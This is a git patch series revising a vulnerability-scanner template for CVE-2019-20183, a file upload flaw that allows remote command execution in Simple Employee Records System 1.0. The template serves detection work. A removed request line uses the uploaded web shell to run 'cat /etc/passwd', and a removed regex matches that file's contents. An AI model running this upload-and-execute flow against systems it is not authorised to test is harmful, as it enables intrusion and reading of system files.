From 56b38f6150c03c5e6466646f9fc59a87f2a92e6c Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Thu, 15 Jun 2023 19:20:01 +0800 Subject: [PATCH 1/4] Update CVE-2019-20183.yaml --- http/cves/2019/CVE-2019-20183.yaml | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 205601d644..66e028b9e6 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -2,7 +2,7 @@ id: CVE-2019-20183 info: name: Simple Employee Records System 1.0 - Unrestricted File Upload - author: pikpikcu + author: pikpikcu,j4vaovo severity: high description: | Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution. @@ -35,8 +35,8 @@ http: Content-Type: image/png -----------------------------5825462663702204104870787337-- @@ -53,10 +53,7 @@ http: - '(?:[a-zA-Z0-9+\/])*_poc.php' matchers: - - type: regex + - type: word part: body - regex: - - "root:.*:0:0:" - condition: and - -# Enhanced by mp on 2022/06/17 + words: + - "CVE-2019-20183" From 3f4c10738fc4a460300a768286424f5d3c497b86 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Thu, 15 Jun 2023 19:21:28 +0800 Subject: [PATCH 2/4] Update CVE-2019-20183.yaml --- http/cves/2019/CVE-2019-20183.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 66e028b9e6..dc54d5d80c 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-434 cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:*:*:*:*:*:*:*:* epss-score: 0.02791 - tags: edb,cve,cve2019,rce,intrusive,fileupload + tags: edb,cve,cve2019,rce,fileupload metadata: max-request: 2 @@ -41,7 +41,7 @@ http: -----------------------------5825462663702204104870787337-- - | - GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1 + GET /uploads/employees_ids/{{endpoint}} HTTP/1.1 Host: {{Hostname}} extractors: @@ -54,6 +54,6 @@ http: matchers: - type: word - part: body + part: body_2 words: - "CVE-2019-20183" From 5eafb4d8e5b50c78529fb6d72eaf67e79cc319b9 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Sun, 18 Jun 2023 23:20:25 +0800 Subject: [PATCH 3/4] Update CVE-2019-20183.yaml --- http/cves/2019/CVE-2019-20183.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index dc54d5d80c..29feff18ed 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -35,7 +35,7 @@ http: Content-Type: image/png -----------------------------5825462663702204104870787337-- @@ -56,4 +56,4 @@ http: - type: word part: body_2 words: - - "CVE-2019-20183" + - "1ad0d710225c472cb7396b3c1d97e4dd" From 306378ef5056d955c687cd0ab4a22a03580a11d2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 19 Jun 2023 11:45:32 +0530 Subject: [PATCH 4/4] add intrusive --- http/cves/2019/CVE-2019-20183.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 29feff18ed..3752b00bcb 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-434 cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:*:*:*:*:*:*:*:* epss-score: 0.02791 - tags: edb,cve,cve2019,rce,fileupload + tags: edb,cve,cve2019,rce,fileupload,intrusive metadata: max-request: 2